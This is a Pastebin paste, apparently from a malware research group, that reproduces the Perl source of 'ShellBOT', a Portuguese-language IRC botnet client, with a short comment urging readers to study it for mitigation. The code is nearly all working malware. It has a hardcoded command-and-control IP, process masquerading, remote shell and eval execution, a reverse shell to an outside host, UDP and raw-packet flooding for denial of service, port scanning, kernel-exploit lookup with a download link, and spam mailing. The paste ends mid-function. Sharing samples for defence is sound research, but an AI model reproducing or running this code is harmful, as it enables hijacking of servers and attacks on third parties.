SHARE
TWEET

Another PerlBot Shell

MalwareMustDie Feb 21st, 2014 690 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie!
  2. #A collection of tons of same stuff,
  3. #It is used over and over and OVER… learn this code well to mitigate.
  4. # is so obvious now.
  5. # @unixfreaxjp | MMD
  6.  
  7.  
  8. $ curl http://121.119.182.119/icons/bug|less
  9. /* サイバー犯罪調査証拠 */
  10.  
  11. #!/usr/bin/perl
  12. #
  13. #  ShellBOT by: lewl
  14. #       Greetz: Puna, Kelserific
  15. #
  16. # Comandos:
  17. #           @oldpack <ip> <bytes> <tempo>;
  18. #           @udp <ip> <porta> <tempo>;
  19. #           @fullportscan <ip> <porta inicial> <porta final>;
  20. #           @conback <ip> <porta>
  21. #           @download <url> <arquivo a ser salvo>;
  22. #           !estatisticas <on/off>;
  23. #           !sair para finalizar o bot;
  24. #           !novonick para trocar o nick do bot por um novo aleatorio;
  25. #           !entra <canal> <tempo>
  26. #           !sai <canal> <tempo>;
  27. #           !pacotes <on/off>
  28. #           @info
  29. #           @xpl <kernel>
  30. #           @sendmail <assunto> <remetente> <destinatario> <conteudo>
  31.  
  32. ########## CONFIGURACAO ############
  33.  
  34. my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
  35. my $processo = $ps[rand scalar @ps];
  36.  
  37. $servidor='74.208.250.181' unless $servidor;
  38. my $porta='6667';
  39. my @canais=("#sonia");
  40. my @adms=("w");
  41.  
  42.  
  43.  
  44. # Anti Flood ( 6/3 Recomendado )
  45. my $linas_max=10;
  46. my $sleep=5;
  47.  
  48. my $nick = getnick();
  49. my $ircname = getident2();
  50. my $realname = "uname -n";
  51. #chop (my $realname = `uname -n`);
  52.  
  53. my $acessoshell = 1;
  54. ######## Stealth ShellBot ##########
  55. my $prefixo = "!all";
  56. my $estatisticas = 0;
  57. my $pacotes = 1;
  58. ####################################
  59.  
  60. my $VERSAO = '0.3b';
  61.  
  62. $SIG{'INT'} = 'IGNORE';
  63. $SIG{'HUP'} = 'IGNORE';
  64. $SIG{'TERM'} = 'IGNORE';
  65. $SIG{'CHLD'} = 'IGNORE';
  66. $SIG{'PS'} = 'IGNORE';
  67.  
  68. use IO::Socket;
  69. use Socket;
  70. use IO::Select;
  71. chdir("/");
  72. $servidor="$ARGV[0]" if $ARGV[0];
  73. $0="$processo"."\0";
  74. my $pid="fork";
  75. exit if $pid;
  76. die "Problema com o fork: $!" unless defined($pid);
  77.  
  78. my %irc_servers;
  79. my %DCC;
  80. my $dcc_sel = new IO::Select->new();
  81.  
  82. #####################
  83. # Stealth Shellbot  #
  84. #####################
  85.  
  86. sub getnick {
  87.   return "vn".int(rand(1000));
  88. }
  89.  
  90. sub getident2 {
  91.         my $length=shift;
  92.         $length = 3 if ($length < 3);
  93.  
  94.         my @chars=('a'..'z','A'..'Z','1'..'9');
  95.         foreach (1..$length)
  96.         {
  97.                 $randomstring.=$chars[rand @chars];
  98.         }
  99.         return $randomstring;
  100. }
  101.  
  102. #############################
  103. #  B0tchZ na veia ehehe :P  #
  104. #############################
  105.  
  106. $sel_cliente = IO::Select->new();
  107. sub sendraw {
  108.   if ($#_ == '1') {
  109.     my $socket = $_[0];
  110.     print $socket "$_[1]\n";
  111.   } else {
  112.       print $IRC_cur_socket "$_[0]\n";
  113.   }
  114. }
  115.  
  116. sub conectar {
  117.    my $meunick = $_[0];
  118.    my $servidor_con = $_[1];
  119.    my $porta_con = $_[2];
  120.  
  121.    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
  122.    if (defined($IRC_socket)) {
  123.      $IRC_cur_socket = $IRC_socket;
  124.  
  125.      $IRC_socket->autoflush(1);
  126.      $sel_cliente->add($IRC_socket);
  127.  
  128.      $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
  129.      $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
  130.      $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  131.      $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
  132.      nick("$meunick");
  133.      sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
  134.      print "\nShellBot $VERSAO by: deviL__\n";
  135.      print "nick: $nick\n";
  136.      print "servidor: $servidor\n\n";
  137.      sleep 2;
  138.    }
  139.  
  140. }
  141. my $line_temp;
  142. while( 1 ) {
  143.    while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  144.    delete($irc_servers{''}) if (defined($irc_servers{''}));
  145.    &DCC::connections;
  146.    my @ready = $sel_cliente->can_read(0.6);
  147.    next unless(@ready);
  148.    foreach $fh (@ready) {
  149.      $IRC_cur_socket = $fh;
  150.      $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
  151.      $nread = sysread($fh, $msg, 4096);
  152.      if ($nread == 0) {
  153.         $sel_cliente->remove($fh);
  154.         $fh->close;
  155.         delete($irc_servers{$fh});
  156.      }
  157.      @lines = split (/\n/, $msg);
  158.  
  159.      for(my $c=0; $c<= $#lines; $c++) {
  160.        $line = $lines[$c];
  161.        $line=$line_temp.$line if ($line_temp);
  162.        $line_temp='';
  163.        $line =~ s/\r$//;
  164.        unless ($c == $#lines) {
  165.          parse("$line");
  166.        } else {
  167.            if ($#lines == 0) {
  168.              parse("$line");
  169.            } elsif ($lines[$c] =~ /\r$/) {
  170.                parse("$line");
  171.            } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  172.                parse("$line");
  173.            } else {
  174.                $line_temp = $line;
  175.            }
  176.        }
  177.       }
  178.    }
  179. }
  180.  
  181. sub parse {
  182.    my $servarg = shift;
  183.    if ($servarg =~ /^PING \:(.*)/) {
  184.      sendraw("PONG :$1");
  185.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  186.        my $pn=$1; my $onde = $4; my $args = $5;
  187.        if ($args =~ /^\001VERSION\001$/) {
  188.          notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
  189.        }
  190.        elsif ($args =~ /^\001PING\s+(\d+)\001$/) {
  191.          notice("$pn", "\001PONG\001");
  192.        }
  193.        elsif (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
  194.          if ($onde eq "$meunick"){
  195.            shell("$pn", "$args");
  196.          }
  197.          elsif ($args =~ /^(\Q$meunick\E|\Q$prefixo\E)\s+(.*)/ ) {
  198.             my $natrix = $1;
  199.             my $arg = $2;
  200.             if ($arg =~ /^\!(.*)/) {
  201.               ircase("$pn","$onde","$1") unless ($natrix eq "$prefixo" and $arg =~ /^\!nick/);
  202.             } elsif ($arg =~ /^\@(.*)/) {
  203.                 $ondep = $onde;
  204.                 $ondep = $pn if $onde eq $meunick;
  205.                 bfunc("$ondep","$1");
  206.             } else {
  207.                 shell("$onde", "$arg");
  208.             }
  209.          }
  210.        }
  211.    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
  212.        if (lc($1) eq lc($meunick)) {
  213.          $meunick=$4;
  214.          $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  215.        }
  216.    } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
  217.        $meunick = getnick();
  218.        nick("$meunick");
  219.    } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
  220.        $meunick = $2;
  221.        $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
  222.        $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
  223.        foreach my $canal (@canais) {
  224.          sendraw("JOIN $canal");
  225.        }
  226.    }
  227. }
  228.  
  229. sub bfunc {
  230.   my $printl = $_[0];
  231.   my $funcarg = $_[1];
  232.   if (my $pid = fork) {
  233.      waitpid($pid, 0);
  234.   } else {
  235.       if (fork) {
  236.          exit;
  237.        } else {
  238.            if ($funcarg =~ /^portscan (.*)/) {
  239.              my $hostip="$1";
  240.              my @portas=("21","22","23","25","53","59","79","80","110","113","135","139","443","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
  241.              my (@aberta, %porta_banner);
  242.              foreach my $porta (@portas)  {
  243.                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
  244.                 if ($scansock) {
  245.                    push (@aberta, $porta);
  246.                    $scansock->close;
  247.                 }
  248.              }
  249.              if (@aberta) {
  250.                sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @aberta");
  251.              } else {
  252.                  sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
  253.              }
  254.            }
  255.  
  256.            #elsif ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
  257.            # getstore("$1", "$2");
  258.            # sendraw($IRC_cur_socket, "PRIVMSG $printl :Download de $2 ($1) Conclu?do!");
  259.            # }
  260.  
  261.            elsif ($funcarg =~ /^fullportscan\s+(.*)\s+(\d+)\s+(\d+)/) {
  262.              my $hostname="$1";
  263.              my $portainicial = "$2";
  264.              my $portafinal = "$3";
  265.              my (@abertas, %porta_banner);
  266.              foreach my $porta ($portainicial..$portafinal)
  267.              {
  268.                my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
  269.                if ($scansock) {
  270.                  push (@abertas, $porta);
  271.                  $scansock->close;
  272.                  sendraw($IRC_cur_socket, "PRIVMSG $printl :Porta $porta aberta em $hostname");
  273.                }
  274.              }
  275.              if (@abertas) {
  276.                sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @abertas");
  277.              } else {
  278.                sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
  279.              }
  280.             }
  281.  
  282.             # Duas Vers?es simplificada do meu Tr0x ;D
  283.             elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
  284.               return unless $pacotes;
  285.               socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
  286.               my $alvo=inet_aton("$1");
  287.               my $porta = "$2";
  288.               my $tempo = "$3";
  289.               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002pacotando\002: $1 \002tempo\002: $tempo");
  290.               my $pacote;
  291.               my $pacotese;
  292.               my $fim = time + $tempo;
  293.               my $pacota = 1;
  294.               while (($pacota == "1")) {
  295.                 $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
  296.                 $pacote=$rand x $rand x $rand;
  297.                 $porta = int(rand 65000) +1 if ($porta == "0");
  298.                 send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++;
  299.               }
  300.                #sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
  301.                #sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
  302.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002pacotado\002: $1 \002tempo\002: $tempo"."segs \002pacotes\002: $pacotese");
  303.             }
  304.  
  305.             elsif ($funcarg =~ /^udpfaixa\s+(.*)\s+(\d+)\s+(\d+)/) {
  306.               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002aviso\002: \@udpfaixa foi removido do bot");
  307.               exit;
  308.               return unless $pacotes;
  309.               socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
  310.               my $faixaip="$1";
  311.               my $porta = "$2";
  312.               my $tempo = "$3";
  313.              sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Pacotando\002: $1 \002tempo\002: $tempo");
  314.               my $pacote;
  315.               my $pacotes;
  316.               my $fim = time + $tempo;
  317.               my $pacota = 1;
  318.               my $alvo;
  319.               while ($pacota == "1") {
  320.                 $pacota = 0 if ((time >= $fim) && ($tempo != "0"));
  321.                 for (my $faixa = 1; $faixa <= 255; $faixa++) {
  322.                   $alvo = inet_aton("$faixaip.$faixa");
  323.                   $pacote=$rand x $rand x $rand;
  324.                   $porta = int(rand 65000) +1 if ($porta == "0");
  325.                   send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++;
  326.                   if ($faixa >= 255) {
  327.                     $faixa = 1;
  328.                   }
  329.                 }
  330.               }
  331.                #sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
  332.                #sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
  333.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002faixa\002: $1"."1-"."$2"."255 \002tempo\002: $tempo"."segs \002pacotes\002: $pacotese");
  334.             }
  335.  
  336.             # Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
  337.             elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
  338.               my $host = "$1";
  339.               my $porta = "$2";
  340.               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Conectando-se em\002: $host:$porta");
  341.               my $proto = getprotobyname('tcp');
  342.               my $iaddr = inet_aton($host);
  343.               my $paddr = sockaddr_in($porta, $iaddr);
  344.               my $shell = "/bin/sh -i";
  345.               if ($^O eq "MSWin32") {
  346.                 $shell = "cmd.exe";
  347.               }
  348.               socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
  349.               connect(SOCKET, $paddr) or die "connect: $!";
  350.               open(STDIN, ">&SOCKET");
  351.               open(STDOUT, ">&SOCKET");
  352.               open(STDERR, ">&SOCKET");
  353.               system("$shell");
  354.               close(STDIN);
  355.               close(STDOUT);
  356.               close(STDERR);
  357.             }
  358.  
  359.            elsif ($funcarg =~ /^oldpack\s+(.*)\s+(\d+)\s+(\d+)/) {
  360.             return unless $pacotes;
  361.              my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
  362.              $dtime = 1 if $dtime == 0;
  363.              my %bytes;
  364.              $bytes{igmp} = $2 * $pacotes{igmp};
  365.              $bytes{icmp} = $2 * $pacotes{icmp};
  366.              $bytes{o} = $2 * $pacotes{o};
  367.              $bytes{udp} = $2 * $pacotes{udp};
  368.              $bytes{tcp} = $2 * $pacotes{tcp};
  369.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
  370.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
  371.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));
  372.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
  373.                sendraw($IRC_cur_socket, "PRIVMSG $printl :\002M?dia de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
  374.            }
  375.            elsif ($funcarg =~ /^xpl\s+(.*)/) {
  376.            my $kernel = "$1";
  377.            if ($kernel =~ /2.4.17/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: newlocal, kmod, uselib24"); goto downloads; }
  378.            if ($kernel =~ /2.4.18/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: newlocal, kmod, brk, brk2"); goto downloads; }
  379.            if ($kernel =~ /2.4.19/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: kmod, newlocal, w00t, brkm brk2"); goto downloads; }
  380.            if ($kernel =~ /2.4.20/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: kmod, kmod2, newlocal, w00t, ptrace, ptrace-kmod, brk, brk2"); goto downloads; }
  381.            if ($kernel =~ /2.4.21/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: brk, brk2, ptrace, ptrace-kmod, uselib24, elflbl"); goto downloads; }
  382.            if ($kernel =~ /2.4.22/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: brk, brk2, ptrace, ptrace-kmod, uselib24, elflbl, mremap_pte, loginx"); goto downloads; }
  383.            if ($kernel =~ /2.4.23/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: uselib24, elflbl, mremap_pte"); goto downloads; }
  384.            if ($kernel =~ /2.4.24/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: uselib24, elflbl, mremap_pte"); goto downloads; }
  385.            if ($kernel =~ /2.4.25/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: uselib24, elflbl"); goto downloads; }
  386.            if ($kernel =~ /2.4.26/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: uselib24, elflbl"); goto downloads; }
  387.            if ($kernel =~ /2.4.27/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: uselib24, elflbl"); goto downloads; }
  388.            if ($kernel =~ /2.4.28/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: uselib24, elflbl"); goto downloads; }
  389.            if ($kernel =~ /2.6.0/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: wuftpd, h00lyshit"); goto downloads; }
  390.            if ($kernel =~ /2.6.2/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: mremap_pte, krad, h00lyshit"); goto downloads; }
  391.            if ($kernel =~ /2.6.5/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: krad, krad2, h00lyshit"); goto downloads; }
  392.            if ($kernel =~ /2.6.6/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: krad, krad2, h00lyshit"); goto downloads; }
  393.            if ($kernel =~ /2.6.7/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: krad2, h00lyshit"); goto downloads; }
  394.            if ($kernel =~ /2.6.8/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: krad2, h00lyshit"); goto downloads; }
  395.            if ($kernel =~ /2.6.9/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: krad2, h00lyshit, r00t"); goto downloads; }
  396.            if ($kernel =~ /2.6.10/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: krad2, h00lyshit"); goto downloads; }
  397.            if ($kernel =~ /2.6.11/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: h00lyshit, k-rad3"); goto downloads; }
  398.            if ($kernel =~ /2.6.12/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: h00lyshit"); goto downloads; }
  399.            if ($kernel =~ /2.6.13/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: raptor, raptor2, h00lyshit, solpot, prctl"); goto downloads; }
  400.            if ($kernel =~ /2.6.14/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: raptor, raptor2, h00lyshit, solpot, prctl"); goto downloads; }
  401.            if ($kernel =~ /2.6.15/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: raptor, raptor2, h00lyshit, solpot, prctl"); goto downloads; }
  402.            if ($kernel =~ /2.6.16/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: raptor, raptor2, h00lyshit, solpot, prctl"); goto downloads; }
  403.            if ($kernel =~ /2.6.17/) { sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: raptor, raptor2, h00lyshit, solpot, prctl"); goto downloads; }
  404.            sendraw($IRC_cur_socket, "PRIVMSG $printl : kernel $kernel rootab with: nothing =)");
  405.            exit;
  406.            downloads:
  407.            sendraw($IRC_cur_socket, "PRIVMSG $printl : downloads: 12http://dvl.by.ru/xpl");
  408.            }
  409.            elsif ($funcarg =~ /^info/) {
  410.            my $sysos = `uname -sr`;
  411.            my $uptime = `uptime`;
  412.            if ( $sysos =~ /freebsd/i ) {
  413.            $sysname = `hostname`;
  414.            $memory = `expr \`cat /var/run/dmesg.boot | grep "real memory" | cut -f5 -d" "\` \/ 1048576`;
  415.            $swap = `$toploc | grep -i swap | cut -f2 -d" " | cut -f1 -d"M"`;
  416.            chomp($memory);
  417.            chomp($swap);
  418.            }
  419.            elsif ( $sysos =~ /linux/i ) {
  420.            $sysname = `hostname -f`;
  421.            $memory = `free -m |grep -i mem | awk '{print \$2}'`;
  422.            $swap = `free -m |grep -i swap | awk '{print \$2}'`;
  423.            chomp($swap);
  424.            chomp($memory);
  425.            }
  426.            else {
  427.            $sysname ="Not Found";;
  428.            $memory ="Not found";
  429.            $swap ="Not Found";
  430.            }
  431.            sendraw($IRC_cur_socket, "PRIVMSG $printl : 15--- 3[01 SysInfo 3] 15-------------");
  432.            sendraw($IRC_cur_socket, "PRIVMSG $printl : 01os/host15;01 $sysos - $sysname ");
  433.            sendraw($IRC_cur_socket, "PRIVMSG $printl : 01proc/PID15;01 $processo - $$");
  434.            sendraw($IRC_cur_socket, "PRIVMSG $printl : 01uptime15;01 $uptime");
  435.            sendraw($IRC_cur_socket, "PRIVMSG $printl : 01memory/swap15;01 $memory - $swap");
  436.            sendraw($IRC_cur_socket, "PRIVMSG $printl : 01perl/bot15;01 $] - $VERSAO");
  437.            sendraw($IRC_cur_socket, "PRIVMSG $printl : 15--- 3[01 /SysInfo 3] 15------------");
  438.            }
  439.            elsif($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
  440.            sendraw($IRC_cur_socket, "PRIVMSG $printl : 01Enviando e-mail para: $3");
  441.            $subject = $1;
  442.            $sender = $2;
  443.            $recipient = $3;
  444.            @corpo = $4;
  445.            $mailtype = "content-type: text/html";
  446.            $sendmail = '/usr/sbin/sendmail';
  447.            open (SENDMAIL, "| $sendmail -t");
  448.            print SENDMAIL "$mailtype\n";
  449.            print SENDMAIL "Subject: $subject\n";
  450.            print SENDMAIL "From: $sender\n";
  451.            print SENDMAIL "To: $recipient\n\n";
  452.            print SENDMAIL "@corpo\n\n";
  453.            close (SENDMAIL);
  454.            sendraw($IRC_cur_socket, "PRIVMSG $printl :01email enviado para: $recipient");
  455.            }
  456.            exit;
  457.     }
  458.   }
  459. }
  460.  
  461. sub ircase {
  462.   my ($kem, $printl, $case) = @_;
  463.  
  464.    if ($case =~ /^join (.*)/) {
  465.      j("$1");
  466.    }
  467.    elsif ($case =~ /^part (.*)/) {
  468.       p("$1");
  469.    }
  470.    elsif ($case =~ /^rejoin\s+(.*)/) {
  471.       my $chan = $1;
  472.       if ($chan =~ /^(\d+) (.*)/) {
  473.         for (my $ca = 1; $ca <= $1; $ca++ ) {
  474.           p("$2");
  475.           j("$2");
  476.         }
  477.       } else {
  478.           p("$chan");
  479.           j("$chan");
  480.       }
  481.    }
  482.    elsif ($case =~ /^op/) {
  483.       op("$printl", "$kem") if $case eq "op";
  484.       my $oarg = substr($case, 3);
  485.       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  486.    }
  487.    elsif ($case =~ /^deop/) {
  488.       deop("$printl", "$kem") if $case eq "deop";
  489.       my $oarg = substr($case, 5);
  490.       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  491.    }
  492.    elsif ($case =~ /^voice/) {
  493.       voice("$printl", "$kem") if $case eq "voice";
  494.       $oarg = substr($case, 6);
  495.       voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  496.    }
  497.    elsif ($case =~ /^devoice/) {
  498.       devoice("$printl", "$kem") if $case eq "devoice";
  499.       $oarg = substr($case, 8);
  500.       devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
  501.    }
  502.    elsif ($case =~ /^msg\s+(\S+) (.*)/) {
  503.       msg("$1", "$2");
  504.    }
  505.    elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
  506.       for (my $cf = 1; $cf <= $1; $cf++) {
  507.         msg("$2", "$3");
  508.       }
  509.    }
  510.    elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
  511.       for (my $cf = 1; $cf <= $1; $cf++) {
  512.         ctcp("$2", "$3");
  513.       }
  514.    }
  515.    elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
  516.       ctcp("$1", "$2");
  517.    }
  518.    elsif ($case =~ /^invite\s+(\S+) (.*)/) {
  519.       invite("$1", "$2");
  520.    }
  521.    elsif ($case =~ /^nick (.*)/) {
  522.       nick("$1");
  523.    }
  524.    elsif ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
  525.        conectar("$2", "$1", 6667);
  526.    }
  527.    elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) {
  528.       DCC::SEND("$1", "$2");
  529.    }
  530.    elsif ($case =~ /^raw (.*)/) {
  531.       sendraw("$1");
  532.    }
  533.    elsif ($case =~ /^eval (.*)/) {
  534.       eval "$1";
  535.    }
  536.    elsif ($case =~ /^entra\s+(\S+)\s+(\d+)/) {
  537.     sleep int(rand($2));
  538.     j("$1");
  539.    }
  540.    elsif ($case =~ /^sai\s+(\S+)\s+(\d+)/) {
  541.     sleep int(rand($2));
  542.     p("$1");
  543.    }
  544.    elsif ($case =~ /^sair/) {
  545.      quit();
  546.    }
  547.    elsif ($case =~ /^novonick/) {
  548.     my $novonick = getnick();
  549.      nick("$novonick");
  550.    }
  551.    elsif ($case =~ /^estatisticas (.*)/) {
  552.      if ($1 eq "on") {
  553.       $estatisticas = 1;
  554.       msg("$printl", "Estat?sticas ativadas!");
  555.      } elsif ($1 eq "off") {
  556.       $estatisticas = 0;
  557.       msg("$printl", "Estat?sticas desativadas!");
  558.      }
  559.    }
  560.    elsif ($case =~ /^pacotes (.*)/) {
  561.      if ($1 eq "on") {
  562.       $pacotes = 1;
  563.       msg("$printl", "Pacotes ativados!") if ($estatisticas == "1");
  564.      } elsif ($1 eq "off") {
  565.       $pacotes = 0;
  566.       msg("$printl", "Pacotes desativados!") if ($estatisticas == "1");
  567.      }
  568.    }
  569. }
  570. sub shell {
  571.   return unless $acessoshell;
  572.   my $printl=$_[0];
  573.   my $comando=$_[1];
  574.   if ($comando =~ /cd (.*)/) {
  575.     chdir("$1") || msg("$printl", "Diret?rio inexistente!");
  576.     return;
  577.   }
  578.   elsif ($pid = fork) {
  579.      waitpid($pid, 0);
  580.   } else {
  581.       if (fork) {
  582.          exit;
  583.        } else {
  584.            my @resp=`$comando 2>&1 3>&1`;
  585.            my $c=0;
  586.            foreach my $linha (@resp) {
  587.              $c++;
  588.              chop $linha;
  589.              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
  590.              if ($c >= "$linas_max") {
  591.                $c=0;
  592.                sleep $sleep;
  593.              }
  594.            }
  595.            exit;
  596.        }
  597.   }
  598. }
  599.  
  600. #eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
  601. sub attacker {
  602.   my $iaddr = inet_aton($_[0]);
  603.   my $msg = 'B' x $_[1];
  604.   my $ftime = $_[2];
  605.   my $cp = 0;
  606.   my (%pacotes);
  607.   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
  608.  
  609.   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
  610.   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  611.   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  612.   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  613.   return(undef) if $cp == 4;
  614.   my $itime = time;
  615.   my ($cur_time);
  616.   while ( 1 ) {
  617.      for (my $porta = 1; $porta <= 65535; $porta++) {
  618.        $cur_time = time - $itime;
  619.        last if $cur_time >= $ftime;
  620.        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
  621.        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
  622.        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
  623.        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
  624.  
  625.        # DoS ?? :P
  626.        for (my $pc = 3; $pc <= 255;$pc++) {
  627.          next if $pc == 6;
  628.          $cur_time = time - $itime;
  629.          last if $cur_time >= $ftime;
  630.          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
  631.          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
  632.        }
  633.      }
  634.      last if $cur_time >= $ftime;
  635.   }
  636.   return($cur_time, %pacotes);
  637. }
  638.  
  639. #############
  640. #  ALIASES  #
  641. #############
  642.  
  643. sub action {
  644.    return unless $#_ == 1;
  645.    sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
  646. }
  647.  
  648. sub ctcp {
  649.    return unless $#_ == 1;
  650.    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
  651. }
  652. sub msg {
  653.    return unless $#_ == 1;
  654.    sendraw("PRIVMSG $_[0] :$_[1]");
  655. }
  656.  
  657. sub notice {
  658.    return unless $#_ == 1;
  659.    sendraw("NOTICE $_[0] :$_[1]");
  660. }
  661.  
  662. sub op {
  663.    return unless $#_ == 1;
  664.    sendraw("MODE $_[0] +o $_[1]");
